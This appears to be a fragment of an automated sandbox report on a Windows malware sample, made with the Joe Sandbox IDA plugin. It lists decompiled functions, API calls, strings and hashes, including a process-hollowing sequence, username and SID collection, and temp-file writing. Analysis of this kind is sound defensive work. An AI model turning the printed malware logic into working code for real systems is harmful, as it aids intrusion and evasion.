0x00406b1d
0x00406b27
0x00406b2f
0x00406b34
0x00406b5f
0x00406b61
0x00406b63
0x00406b86
0x00000000
0x00406b89
0x00406b65
0x00406b78
0x00406b7d
0x00406b7f
0x00406b80
0x00000000
0x00406b80
0x00406b36
0x00406b49
0x00406b4e
0x00000000
0x00406b4e
0x00406ad2
0x00406ad7
0x00406ada
0x00406adc
0x00000000
0x00000000
0x00406ade
0x00406af5
0x00406af5
0x00000000
0x00406afd
0x00406afd
0x00406aff
0x00000000
0x00000000
0x00406b01
0x00406b0a
0x00406b17
0x00406b17
0x00000000
0x00406b17
0x00406b03
0x00406b08
0x00000000
0x00000000
0x00000000
0x00406b08

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
String ID:
API String ID: 3188212458-0
Opcode ID: f20540f086f6cde11da1c0912bd8b4db093012cd4bd3a0bf5db3ffead886992b
Instruction ID: 9406106fe81e47b207fd746d5c11beca6957dd7a726dfd862efddfda91f1d23f
Opcode Fuzzy Hash: f20540f086f6cde11da1c0912bd8b4db093012cd4bd3a0bf5db3ffead886992b
Instruction Fuzzy Hash: 8031EEB2900108BFDF00EFA09D45ADF7F78AF48310F15807AE112F7291D674AAA08F69

Uniqueness

Uniqueness Score: -1.00%

Function 00476761, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004767AC
htonl.WS2_32(?), ref: 004767C8
htonl.WS2_32(?), ref: 004767D7
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 004768DA
ExitProcess.KERNEL32 ref: 004769A5

Strings

localcfg, xrefs: 0047697D
except_info, xrefs: 00476978

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Processhtonl$CurrentExitHugeRead
String ID: except_info$localcfg
API String ID: 1150517154-3605449297
Opcode ID: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
Instruction ID: 1bca9885fe75db6845ff832f47503ae1196568d154ed7a1a8ff8ff6c41ea6292
Opcode Fuzzy Hash: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
Instruction Fuzzy Hash: 86616071940208EFDB609FA4DC45FEA77E9FF08300F24806AFA6DD2161DA759994CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

APIs

GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
LocalFree.KERNEL32(00000120), ref: 0040701F
wsprintfA.USER32 ref: 00407036

Strings

|, xrefs: 00406FB3
/%d, xrefs: 00407030

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
String ID: /%d$|
API String ID: 676856371-4124749705
Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98

Uniqueness

Uniqueness Score: -1.00%

Function 00472F71, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorylibrarystringCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 00472F8A
LoadLibraryA.KERNEL32(?), ref: 00472F9A
GetProcAddress.KERNEL32(00000000,004103F0), ref: 00472FB1
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00472FE9
RtlAllocateHeap.NTDLL(00000000), ref: 00472FF0
lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 0047301B

Strings

dnsapi.dll, xrefs: 00472F79

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: dnsapi.dll
API String ID: 1242400761-3175542204
Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
Instruction ID: cc5de89ca0a9648f73f803872a30d244f7d63f889c05c3419bcf74ae0cffca6c
Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
Instruction Fuzzy Hash: FF21A471940269BBCB219F64DC449EFBBBCEF18751F108026F809E7200D7B49A8197D8

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC9, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
GetProcAddress.KERNEL32(00000000), ref: 00406CEE
GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

Strings

kernel32, xrefs: 00406CE2
C:\Windows\SysWOW64\, xrefs: 00406CC9, 00406CD1, 00406CFE, 00406D05, 00406D13, 00406D1E, 00406D2A, 00406D42, 00406D5F, 00406D85
GetSystemWow64DirectoryA, xrefs: 00406CDD

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
API String ID: 1082366364-3395550214
Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD

Uniqueness

Uniqueness Score: -1.00%

Function 004799CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00479A01
GetThreadContext.KERNEL32(?,?), ref: 00479A3B
TerminateProcess.KERNEL32(?,00000000), ref: 00479A49
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00479A81
SetThreadContext.KERNEL32(?,00010002), ref: 00479A9E
ResumeThread.KERNEL32(?), ref: 00479AAB

Strings

D, xrefs: 004799F9

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D
API String ID: 2981417381-2746444292
Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
Instruction ID: 6483746701e37086ef42ef0bfa4d30ebe8a4e792f9ddcfd433cfb6894c22367b
Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
Instruction Fuzzy Hash: 7F214FB1D01119BBDF11DBA1DC49EEF7BBCEF05754F008061B919E1150EB758A44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00471BEC, Relevance: 12.1, APIs: 8, Instructions: 106memorylibraryCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(004102D8), ref: 00471C01
LoadLibraryA.KERNEL32(004102C8), ref: 00471C0F
GetProcessHeap.KERNEL32 ref: 00471C6D
RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 00471C86
RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 00471CAA
HeapFree.KERNEL32(?,00000000,00000000), ref: 00471CEB
FreeLibrary.KERNEL32(?), ref: 00471CF4

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
String ID:
API String ID: 2324436984-0
Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
Instruction ID: 997e8e896ad6cc89b9f49137d14362c4b5227ea34b00eaade8a37b11eba24e0a
Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
Instruction Fuzzy Hash: 40316172900219BFCB119FE8DD888EFBBB9EB45301B24847BE505E3220D7B95D80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00476CB0, Relevance: 10.6, APIs: 7, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00476CCD
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00476D0B
GetLastError.KERNEL32 ref: 00476D90
CloseHandle.KERNEL32(?), ref: 00476D9E
GetLastError.KERNEL32 ref: 00476DBF
DeleteFileA.KERNEL32(?), ref: 00476DD0
GetLastError.KERNEL32 ref: 00476DE6

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
String ID:
API String ID: 3873183294-0
Opcode ID: f20540f086f6cde11da1c0912bd8b4db093012cd4bd3a0bf5db3ffead886992b
Instruction ID: 0f31174c9c5f616a4a7a9865eef07ae29394658c772370c7a4d3ab489e4ab167
Opcode Fuzzy Hash: f20540f086f6cde11da1c0912bd8b4db093012cd4bd3a0bf5db3ffead886992b
Instruction Fuzzy Hash: 97312E72A00608BFCB20AFA49D41ADF7F7AEF48310F15C06AE254E3211D7744A948B68

Uniqueness

Uniqueness Score: -1.00%

Function 00476F19, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\ncvtznjl,0047702C), ref: 00476F37
GetProcAddress.KERNEL32(00000000), ref: 00476F3E
GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00476F64
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00476F7B

Strings

C:\Windows\SysWOW64\, xrefs: 00476F19, 00476F21, 00476F4E, 00476F55, 00476F63, 00476F6E, 00476F7A, 00476F92, 00476FAF, 00476FD5
\\.\pipe\ncvtznjl, xrefs: 00476F20

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$\\.\pipe\ncvtznjl
API String ID: 1082366364-2594293668
Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
Instruction ID: d9ded27b46594bcc61ca4a82ad97412bb732350744f3df1feab526dd375b1e20
Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
Instruction Fuzzy Hash: 192126217417447AF7225331AD89FFB2E4D8B52718F09C0ABF40CE6291CADD8C9982BD

Uniqueness

Uniqueness Score: -1.00%

Function 0047AA11, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 247stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0047AACE

Strings

, xrefs: 0047AB9C
localcfg, xrefs: 0047AD5B

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: $localcfg
API String ID: 1659193697-2018645984
Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
Instruction ID: 4d61f6c05b56bc78db5e3c75d52f082bf1f2eae01dd9e42773dd83d5afe3563f
Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
Instruction Fuzzy Hash: BB714C72944204BADF319B54DC85FEF376AEB80305F24C027F90DA2291DA6D9DA9871F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8A1, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5

lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F

Strings

localcfg, xrefs: 0040E8AB
flags_upd, xrefs: 0040E8A7

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
String ID: flags_upd$localcfg
API String ID: 204374128-3505511081
Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54

Uniqueness

Uniqueness Score: -1.00%

Function 0047E8A4, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 96stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0047DF55: GetCurrentThreadId.KERNEL32 ref: 0047DFA3

lstrcmp.KERNEL32(00410178,00000000), ref: 0047E8E3
lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,00476111), ref: 0047E939
lstrcmp.KERNEL32(?,00000008), ref: 0047E972

Strings

A, xrefs: 0047E8AF, 0047E8B6, 0047E91F, 0047E981
A, xrefs: 0047E949, 0047E94E
A, xrefs: 0047E989

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrcmp$CurrentThreadlstrcpyn
String ID: A$ A$ A
API String ID: 2920362961-1846390581
Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
Instruction ID: 64bef75e0eb7e0584d164dc648f7b640c3741bd2533d6a966dadf531145f00ed
Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
Instruction Fuzzy Hash: 2331C072600305DFCB319F26C8847D77BE4AB09324F15C6ABE65987651D378E880CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA7, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}

APIs

IsBadCodePtr.KERNEL32 ref: 00406BB2

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Code
String ID:
API String ID: 3609698214-0
Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C

Uniqueness

Uniqueness Score: -1.00%

Function 00476DF7, Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

IsBadCodePtr.KERNEL32 ref: 00476E02

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Code
String ID:
API String ID: 3609698214-0
Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
Instruction ID: 0e1ca53c610b3b382126607ecd56017dc347c9c9a17c8bdf582944907e07cc9d
Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
Instruction Fuzzy Hash: F1218E76104505FFDB109BA1FC49EEF3EAEDB48764B21C52AF50AE10A1EB748A40967C

Uniqueness

Uniqueness Score: -1.00%

Function 00409064, Relevance: 9.1, APIs: 6, Instructions: 83
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}

0x0040907b
0x00409088
0x0040908e
0x00409095
0x0040909c
0x004090a8
0x004090b4
0x004090c9
0x004090ca
0x004090e9
0x004090f8
0x00409114
0x00409118
0x00000000
0x0040913f
0x0040912d
0x00409134
0x00000000

APIs

GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
wsprintfA.USER32 ref: 004090E9
CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
CloseHandle.KERNEL32(00000000), ref: 00409134

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

